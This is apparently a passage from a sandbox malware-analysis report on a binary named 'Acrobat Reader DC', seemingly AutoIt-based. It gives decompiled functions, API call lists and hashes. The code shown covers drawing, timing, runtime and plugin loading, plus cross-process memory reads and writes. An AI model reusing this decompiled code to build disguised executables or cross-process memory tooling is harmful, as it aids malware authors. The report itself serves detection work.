                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                  • String ID:
                                  • API String ID: 3087257052-0
                                  • Opcode ID: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                  • Opcode Fuzzy Hash: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044719B(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, long _a20) {
				struct tagLOGBRUSH _v16;
				intOrPtr _t11;
				void* _t14;
				void* _t17;
				long _t21;
				void* _t22;
				long _t23;
				intOrPtr _t24;
				struct HDC__* _t25;
				void* _t27;
				void* _t28;
				void* _t29;

				_t21 = _a16;
				_t24 = _a8;
				_t23 = _a20;
				if(_t24 == 0xffffffff) {
					L10:
					_t25 = _a4;
					L11:
					_t11 = _a12;
					if(_t11 == 0xffffffff) {
						L14:
						return _t11;
					}
					_t35 = _t11 - 0xfffffffe;
					if(_t11 == 0xfffffffe) {
						goto L14;
					}
					return SelectObject(_t25, E00441432(_t22, _t35, _t11, 0));
				}
				_t27 =  *0x4a86f4 - _t24; // 0x0
				if(_t27 != 0) {
					L4:
					_t14 =  *0x4a86e4; // 0x0
					if(_t14 != 0) {
						DeleteObject(_t14);
						 *0x4a86e4 = 0;
					}
					 *0x4a86f0 = _t23;
					 *0x4a86f4 = _t24;
					 *0x4a86f8 = _t21;
					_v16.lbStyle = 0;
					_v16.lbColor = _t24;
					_v16.lbHatch = 0;
					if(_t23 != 1) {
						_t21 = _t21 | 0x00010000;
					}
					_t17 = ExtCreatePen(_t21, _t23,  &_v16, 0, 0);
					_t25 = _a4;
					 *0x4a86e4 = _t17;
					 *0x4a86e8 = SelectObject(_t25, _t17);
					if( *0x4a86ec == 0) {
						BeginPath(_t25);
						 *0x4a86ec = 1;
					}
					goto L11;
				}
				_t28 =  *0x4a86f0 - _t23; // 0x0
				if(_t28 != 0) {
					goto L4;
				}
				_t29 =  *0x4a86f8 - _t21; // 0x0
				if(_t29 == 0) {
					goto L10;
				}
				goto L4;
			}















                                  0x004471a2
                                  0x004471a6
                                  0x004471aa
                                  0x004471b0
                                  0x0044724c
                                  0x0044724c
                                  0x0044724f
                                  0x0044724f
                                  0x00447255
                                  0x00447272
                                  0x00447272
                                  0x00447272
                                  0x00447257
                                  0x0044725a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00447266
                                  0x004471b6
                                  0x004471bc
                                  0x004471ce
                                  0x004471ce
                                  0x004471d5
                                  0x004471d8
                                  0x004471de
                                  0x004471de
                                  0x004471ea
                                  0x004471f0
                                  0x004471f6
                                  0x004471fc
                                  0x004471ff
                                  0x00447202
                                  0x00447208
                                  0x0044720a
                                  0x0044720a
                                  0x00447218
                                  0x0044721e
                                  0x00447223
                                  0x00447235
                                  0x0044723a
                                  0x0044723d
                                  0x00447243
                                  0x00447243
                                  0x00000000
                                  0x0044723a
                                  0x004471be
                                  0x004471c4
                                  0x00000000
                                  0x00000000
                                  0x004471c6
                                  0x004471cc
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                  • BeginPath.GDI32(?), ref: 0044723D
                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$BeginCreateDeletePath
                                  • String ID:
                                  • API String ID: 2338827641-0
                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00434582(int __eax, long long __fp0, long _a4) {
				intOrPtr _v8;
				union _LARGE_INTEGER _v12;
				union _LARGE_INTEGER _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long long _v36;
				long long _v44;
				signed char _t17;
				long _t25;
				long _t26;

				_t27 = __fp0;
				_t13 = __eax;
				_t25 = _a4;
				_t26 = _t25;
				if(_t26 < 0) {
					return __eax;
				} else {
					if(_t26 != 0) {
						if(_t25 >= 0xf) {
							L10:
							Sleep(_t25);
							return _t13;
						}
						_t13 = QueryPerformanceCounter( &_v20);
						if(_t13 == 0) {
							goto L10;
						}
						_a4 = _t25;
						asm("fild dword [ebp+0x8]");
						if(_t25 < 0) {
							_t27 = __fp0 +  *0x48cd18;
						}
						_v44 = _t27;
						do {
							Sleep(0);
							QueryPerformanceCounter( &_v12);
							asm("sbb eax, [ebp-0xc]");
							_v28 = _v12.LowPart - _v20.LowPart;
							_v24 = _v8;
							asm("fild qword [ebp-0x18]");
							_v36 = _t27;
							_t17 = E0040DBD0(_v8);
							asm("fdivr qword [ebp-0x20]");
							asm("fcomp qword [ebp-0x28]");
							asm("fnstsw ax");
						} while ((_t17 & 0x00000005) != 0);
						return _t17;
					} else {
						Sleep(0);
						return _t13;
					}
				}
			}













                                  0x00434582
                                  0x00434582
                                  0x00434589
                                  0x0043458c
                                  0x0043458e
                                  0x0043461e
                                  0x00434594
                                  0x00434594
                                  0x004345a9
                                  0x00434612
                                  0x00434613
                                  0x00000000
                                  0x00434619
                                  0x004345b5
                                  0x004345b9
                                  0x00000000
                                  0x00000000
                                  0x004345bb
                                  0x004345be
                                  0x004345c3
                                  0x004345c5
                                  0x004345c5
                                  0x004345cb
                                  0x004345d2
                                  0x004345d4
                                  0x004345de
                                  0x004345e9
                                  0x004345ec
                                  0x004345ef
                                  0x004345f2
                                  0x004345f5
                                  0x004345f8
                                  0x004345fd
                                  0x00434600
                                  0x00434603
                                  0x00434605
                                  0x0043460f
                                  0x00434596
                                  0x00434598
                                  0x004345a2
                                  0x004345a2
                                  0x00434594

                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042FD29(struct HDC__* _a4, intOrPtr _a8) {
				void* _t3;
				void* _t5;
				int _t6;
				intOrPtr _t10;
				struct HDC__* _t11;

				_t11 = _a4;
				_t10 = _a8;
				if( *0x4a86ec != 0) {
					EndPath(_t11);
					 *0x4a86ec = 0;
					if(_t10 == 0xffffffff || _t10 == 0xfffffffe) {
						StrokePath(_t11);
					} else {
						StrokeAndFillPath(_t11);
					}
				}
				_t3 =  *0x4a86e8; // 0x0
				if(_t3 == 0) {
					return _t3;
				} else {
					SelectObject(_t11, _t3);
					_t5 =  *0x4a86e4; // 0x0
					 *0x4a86e8 = 0;
					_t6 = DeleteObject(_t5);
					 *0x4a86e4 = 0;
					 *0x4a86f4 = 0xffffffff;
					return _t6;
				}
			}








                                  0x0042fd34
                                  0x0042fd38
                                  0x0042fd3b
                                  0x0042fd3e
                                  0x0042fd44
                                  0x0042fd4e
                                  0x0042fd5f
                                  0x0042fd55
                                  0x0042fd56
                                  0x0042fd56
                                  0x0042fd4e
                                  0x0042fd65
                                  0x0042fd6c
                                  0x0042fda3
                                  0x0042fd6e
                                  0x0042fd70
                                  0x0042fd76
                                  0x0042fd7c
                                  0x0042fd86
                                  0x0042fd8c
                                  0x0042fd96
                                  0x00000000
                                  0x0042fd96

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                  • String ID:
                                  • API String ID: 2625713937-0
                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00417803(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x48d128);
				E00416C70(__ebx, __edi, __esi);
				_t28 = E00417A69(__ebx, _t31);
				_t12 =  *0x490800; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E004182CB(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E004177B6(_t29,  *0x490a48);
					 *(_t30 - 4) = 0xfffffffe;
					E00417870();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00417A69(_t20, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E00411924(_t25, _t34);
				}
				return E00416CB5(_t29);
			}









                                  0x00417803
                                  0x00417803
                                  0x00417803
                                  0x00417803
                                  0x00417803
                                  0x00417805
                                  0x0041780a
                                  0x00417814
                                  0x00417816
                                  0x0041781e
                                  0x00417842
                                  0x00417844
                                  0x0041784a
                                  0x00417854
                                  0x0041785f
                                  0x00417862
                                  0x00417869
                                  0x00417820
                                  0x00417820
                                  0x00417824
                                  0x00000000
                                  0x00417826
                                  0x0041782b
                                  0x0041782b
                                  0x00417824
                                  0x0041782e
                                  0x00417830
                                  0x00417832
                                  0x00417834
                                  0x00417839
                                  0x00417841

                                  APIs
                                  • __getptd.LIBCMT ref: 0041780F
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __getptd.LIBCMT ref: 00417826
                                  • __amsg_exit.LIBCMT ref: 00417834
                                  • __lock.LIBCMT ref: 00417844
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E0043659E(struct HWND__** _a4, char _a8, intOrPtr* _a12) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				char _v168;
				void* __edi;
				intOrPtr _t58;
				struct HWND__** _t83;
				struct HWND__* _t95;
				char* _t100;
				struct HWND__** _t101;
				long _t106;
				long _t107;

				_t83 = _a4;
				E00410620( &_v168);
				_v24 = _a8;
				_t106 = E004343AD( &_v168, 0x10,  *_t83);
				E00434319( &_v168,  &_v24, _t106, 0x10);
				_t95 =  *_t83;
				SendMessageW(_t95, 0x1104, 0, _t106);
				E004342DD( &_v168, _t106,  &_v24, 0x10);
				_t101 = _v24;
				asm("cdq");
				_t58 = (_v12 - _v20 - _t95 >> 1) + _v20;
				 *((intOrPtr*)(_a12 + 4)) = _t58;
				_v36 = _t58;
				_t107 = E004343AD( &_v168, 0x10,  *_t83);
				if(_t101 > _v16) {
					L6:
					E00410640( &_v168);
					return 0;
				} else {
					while(1) {
						_v40 = _t101;
						E00434319( &_v168,  &_v40, _t107, 0x10);
						SendMessageW( *_t83, 0x1111, 0, _t107);
						E004342DD( &_v168, _t107,  &_v40, 0x10);
						if((_v32 & 0x00000040) != 0) {
							break;
						}
						_t101 = _t101 + 1;
						if(_t101 <= _v16) {
							continue;
						} else {
							E00410640( &_v168);
							return 0;
						}
						goto L13;
					}
					if(_t101 <= _v16) {
						_a4 = _t101;
						while(1) {
							_v40 = _t101;
							E00434319( &_v168,  &_v40, _t107, 0x10);
							SendMessageW( *_t83, 0x1111, 0, _t107);
							_t100 =  &_v168;
							E004342DD(_t100, _t107,  &_v40, 0x10);
							if((_v32 & 0x00000040) == 0) {
								break;
							}
							_t101 = _t101 + 1;
							if(_t101 <= _v16) {
								continue;
							} else {
								E00410640( &_v168);
								return 0;
							}
							goto L13;
						}
						if(_t101 > _v16) {
							goto L6;
						} else {
							asm("cdq");
							 *_a12 = _a4 + (_t101 - _a4 - _t100 >> 1);
							E00410640( &_v168);
							return 1;
						}
					} else {
						goto L6;
					}
				}
				L13:
			}



















                                  0x004365a8
                                  0x004365b3
                                  0x004365c7
                                  0x004365d1
                                  0x004365df
                                  0x004365e4
                                  0x004365ef
                                  0x00436603
                                  0x0043660e
                                  0x00436613
                                  0x0043661b
                                  0x0043661d
                                  0x00436620
                                  0x00436634
                                  0x00436639
                                  0x0043669f
                                  0x004366a5
                                  0x004366b2
                                  0x0043663e
                                  0x0043663e
                                  0x0043664c
                                  0x0043664f
                                  0x0043665f
                                  0x00436673
                                  0x0043667c
                                  0x00000000
                                  0x00000000
                                  0x0043667e
                                  0x00436682
                                  0x00000000
                                  0x00436684
                                  0x0043668a
                                  0x00436697
                                  0x00436697
                                  0x00000000
                                  0x00436682
                                  0x0043669d
                                  0x004366b5
                                  0x004366be
                                  0x004366cc
                                  0x004366cf
                                  0x004366df
                                  0x004366ec
                                  0x004366f3
                                  0x004366fc
                                  0x00000000
                                  0x00000000
                                  0x004366fe
                                  0x00436702
                                  0x00000000
                                  0x00436704
                                  0x0043670a
                                  0x00436717
                                  0x00436717
                                  0x00000000
                                  0x00436702
                                  0x0043671d
                                  0x00000000
                                  0x0043671f
                                  0x00436726
                                  0x00436736
                                  0x00436738
                                  0x00436745
                                  0x00436745
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043669d
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00434B02(CHAR* _a4, CHAR* _a8, signed int* _a12) {
				struct HINSTANCE__** _v8;
				struct HINSTANCE__* _v12;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__** _t45;
				_Unknown_base(*)()* _t50;
				_Unknown_base(*)()*** _t63;
				_Unknown_base(*)()* _t66;
				CHAR* _t92;
				signed int _t94;

				_t92 = _a4;
				_t44 = LoadLibraryA(_a8);
				_v12 = _t44;
				if(_t44 != 0) {
					_t66 =  *(_t92 + 8);
					_t94 = 0;
					__eflags = _t66;
					if(__eflags != 0) {
						_t63 =  *(_t92 + 4);
						while(1) {
							__eflags =  *( *_t63);
							if(__eflags == 0) {
								goto L6;
							}
							_t94 = _t94 + 1;
							_t63 =  &(_t63[1]);
							__eflags = _t94 - _t66;
							if(__eflags < 0) {
								continue;
							}
							goto L6;
						}
					}
					L6:
					_push(0xc);
					_t45 = E004115D7(_t92, _t94, __eflags);
					_v8 = _t45;
					__eflags = _t94 - _t66;
					if(_t94 != _t66) {
						 *(( *(_t92 + 4))[_t94]) = _t45;
					} else {
						E00436299(_t92,  &_v8);
					}
					 *( *(( *(_t92 + 4))[_t94])) = _v12;
					_t50 = GetProcAddress( *( *(( *(_t92 + 4))[_t94])), "AU3_GetPluginDetails");
					__eflags = _t50;
					if(_t50 != 0) {
						_a4 = 0;
						_a8 = 0;
						 *_t50( &_a4,  &_a8);
						( *(( *(_t92 + 4))[_t94]))[1] = _a4;
						 *_a12 = _t94;
						( *(( *(_t92 + 4))[_t94]))[2] = _a8;
						__eflags = 0;
						return 0;
					} else {
						FreeLibrary( *( *(( *(_t92 + 4))[_t94])));
						_push( *(( *(_t92 + 4))[_t94]));
						E004111DC();
						 *(( *(_t92 + 4))[_t94]) = 0;
						return 3;
					}
				} else {
					return 3;
				}
			}














                                  0x00434b0c
                                  0x00434b10
                                  0x00434b16
                                  0x00434b1b
                                  0x00434b2a
                                  0x00434b2e
                                  0x00434b30
                                  0x00434b32
                                  0x00434b34
                                  0x00434b37
                                  0x00434b39
                                  0x00434b3c
                                  0x00000000
                                  0x00000000
                                  0x00434b3e
                                  0x00434b3f
                                  0x00434b42
                                  0x00434b44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00434b44
                                  0x00434b37
                                  0x00434b46
                                  0x00434b46
                                  0x00434b48
                                  0x00434b50
                                  0x00434b53
                                  0x00434b55
                                  0x00434b69
                                  0x00434b57
                                  0x00434b5c
                                  0x00434b5c
                                  0x00434b76
                                  0x00434b88
                                  0x00434b90
                                  0x00434b92
                                  0x00434bd2
                                  0x00434bd5
                                  0x00434bd8
                                  0x00434be5
                                  0x00434bf9
                                  0x00434bfd
                                  0x00434c00
                                  0x00434c06
                                  0x00434b94
                                  0x00434b9f
                                  0x00434bad
                                  0x00434bae
                                  0x00434bbc
                                  0x00434bc7
                                  0x00434bc7
                                  0x00434b1d
                                  0x00434b26
                                  0x00434b26

                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: AU3_GetPluginDetails
                                  • API String ID: 145871493-4132174516
                                  • Opcode ID: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                  • Opcode Fuzzy Hash: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
